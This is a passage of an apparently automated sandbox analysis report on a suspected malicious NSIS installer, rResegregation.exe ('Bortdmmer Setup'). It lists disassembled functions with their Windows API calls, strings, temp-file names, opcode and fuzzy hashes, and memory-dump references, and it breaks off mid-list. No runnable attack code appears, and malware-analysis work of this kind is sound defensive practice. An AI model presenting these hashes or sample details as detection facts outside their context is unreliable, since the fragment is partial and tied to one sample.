                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Send$ClientScreen
                                                                  • String ID: f
                                                                  • API String ID: 41195575-1993550816
                                                                  • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                  • Instruction ID: d51aeaa30401db709ca0a87e6a09b4ddb89123452d3ebce91a639796f0b83af5
                                                                  • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                  • Instruction Fuzzy Hash: 54019275D00218BADB00DBA4CC41BFEBBBCAF85711F10412BBB10B71C0C7B465018BA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                  • MulDiv.KERNEL32(000D5E8B,00000064,000D7B88), ref: 00402BC5
                                                                  • wsprintfA.USER32 ref: 00402BD5
                                                                  • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                  Strings
                                                                  • verifying installer: %d%%, xrefs: 00402BCF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                  • String ID: verifying installer: %d%%
                                                                  • API String ID: 1451636040-82062127
                                                                  • Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                  • Instruction ID: 06d6233bfb864841df38fb05631849b064d35824abf3621066cb5e46443ac4cc
                                                                  • Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                  • Instruction Fuzzy Hash: EE014F70540209FBEF209F60DD4AEAE3B69AB04304F00803AFA16B92D0D7B8A951DB59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalAlloc.KERNEL32(00000040,00032C00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                  • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                  • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                  • String ID:
                                                                  • API String ID: 2667972263-0
                                                                  • Opcode ID: 4409c9af0e4a5f9d89842a68b2d3119a8129694f240a68dc73fb08f0ed421e3f
                                                                  • Instruction ID: f67dc9fade15bd1aaf4953b10d7ffc98cf8df4ed40540c93fb8cebdcb82cf2c3
                                                                  • Opcode Fuzzy Hash: 4409c9af0e4a5f9d89842a68b2d3119a8129694f240a68dc73fb08f0ed421e3f
                                                                  • Instruction Fuzzy Hash: 71217A71800128BBCF216FA5DE49EAEBB79EF09324F10022AF914762E1C7795D018B99
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004046E6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                  • wsprintfA.USER32 ref: 0040478C
                                                                  • SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                  • String ID: %u.%u%s%s$@y
                                                                  • API String ID: 3540041739-3020698753
                                                                  • Opcode ID: cedd47ab848f1e488b90f6cdfa530e5e3c90b5a13cd6639f012025bff0f45968
                                                                  • Instruction ID: 4638cabbc4a31f91baf710fec8468dae319bf79d1b1f68d9e24bb075fcb279e4
                                                                  • Opcode Fuzzy Hash: cedd47ab848f1e488b90f6cdfa530e5e3c90b5a13cd6639f012025bff0f45968
                                                                  • Instruction Fuzzy Hash: D911E7736041283BEB00656D9D45EEF328CDB86374F254237FA25F31D1EA78CC1146A8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDlgItem.USER32(?), ref: 00401CE2
                                                                  • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                  • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                  • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                  • String ID:
                                                                  • API String ID: 1849352358-0
                                                                  • Opcode ID: 6926be61915e0fb459712a2c8d02a2c7f8cad9225e26cef3932069b61eeff660
                                                                  • Instruction ID: 92ae7547fb934e5b20a31b6555936ed9a04085bedc3b988c85494c1bea2cd4ea
                                                                  • Opcode Fuzzy Hash: 6926be61915e0fb459712a2c8d02a2c7f8cad9225e26cef3932069b61eeff660
                                                                  • Instruction Fuzzy Hash: CCF0E7B2A04114AFEB01ABE4DE88DAFB7BDFB54305B10446AF602F6191C7789D018B79
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401D38 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetDC.USER32(?), ref: 00401D3B
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                  • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                                  • String ID:
                                                                  • API String ID: 3808545654-0
                                                                  • Opcode ID: bf0e8217d613a89089dc93bce4a4cc97ba2f5610907d087a876188692ec465c3
                                                                  • Instruction ID: cf9238c777b6589bee1a324002302adcb4b1f2371c80511fc572ea77625e262b
                                                                  • Opcode Fuzzy Hash: bf0e8217d613a89089dc93bce4a4cc97ba2f5610907d087a876188692ec465c3
                                                                  • Instruction Fuzzy Hash: 96016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E2C67811569B3F
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00403951 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowTextA.USER32(00000000,Bortdmmer Setup), ref: 004039E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: TextWindow
                                                                  • String ID: "C:\Users\user\Desktop\rResegregation.exe"$1033$Bortdmmer Setup
                                                                  • API String ID: 530164218-3200382464
                                                                  • Opcode ID: 3510cc6ce00ab04885f005c1ae9853ed867939ffbe97b1e5fcc982a599d3e754
                                                                  • Instruction ID: a7121fc51e20562cbfa027eee4ba04e2135699cbca2cdd3690fce58e300c9c30
                                                                  • Opcode Fuzzy Hash: 3510cc6ce00ab04885f005c1ae9853ed867939ffbe97b1e5fcc982a599d3e754
                                                                  • Instruction Fuzzy Hash: 8311D1B5B056108BE720DF15DC80A73776CEBC6755B28813FE841A73E1D73D9D028A98
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040586C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Bortdmmer Setup,NSIS Error), ref: 00405D19
                                                                    • Part of subcall function 00405817: CharNextA.USER32(?,?,Mundstykket.min,?,00405883,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                    • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
                                                                    • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E
                                                                  • lstrlenA.KERNEL32(Mundstykket.min,00000000,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058BF
                                                                  • GetFileAttributesA.KERNEL32(Mundstykket.min,Mundstykket.min,Mundstykket.min,Mundstykket.min,Mundstykket.min,Mundstykket.min,00000000,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\), ref: 004058CF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$Mundstykket.min
                                                                  • API String ID: 3248276644-3047242854
                                                                  • Opcode ID: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                  • Instruction ID: 819bf3b96d2f33be72422b420245a44e5a303c51be7f34a106cb995fc7f4ae7e
                                                                  • Opcode Fuzzy Hash: 2b232cbcfe35a2a259e0e65083c3ab1013c8774cdbeba63489dc7f6696da3121
                                                                  • Instruction Fuzzy Hash: B7F0CD27115D5119E61632361C05ABF1A58CE82364718C53FFC51F22D1EA3C8862DD7E
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040577E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405784
                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 0040578D
                                                                  • lstrcatA.KERNEL32(?,00409014), ref: 0040579E
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                  • API String ID: 2659869361-3355392842
                                                                  • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                  • Instruction ID: 68e0f27090206f37803ec84d28e37c7f09ebc5753c251fe5cd2e9e8878fbe2c1
                                                                  • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                                                  • Instruction Fuzzy Hash: 44D0A972606A307AE2022A15AC09E8F2A08CF62301B044433F200B22A2C63C4E418BFE
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405817 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharNextA.USER32(?,?,Mundstykket.min,?,00405883,Mundstykket.min,Mundstykket.min,76483410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,76483410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                  • CharNextA.USER32(00000000), ref: 0040582A
                                                                  • CharNextA.USER32(00000000), ref: 0040583E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28751542047.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: CharNext
                                                                  • String ID: Mundstykket.min
                                                                  • API String ID: 3213498283-3661976162
                                                                  • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                  • Instruction ID: db1d673f1cc138dbc44dca3842ff1338afb0bbfba97f9f865265ae6769849a0e
                                                                  • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                                                  • Instruction Fuzzy Hash: 8AF06253908F916AFB3272350C84B6B5B89CB55351F1C847BEE41AA2D2827C58608F9A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                  • GetTickCount.KERNEL32 ref: 00402C33
                                                                  • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.28750840708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.28750792899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750887517.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.28750936798.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
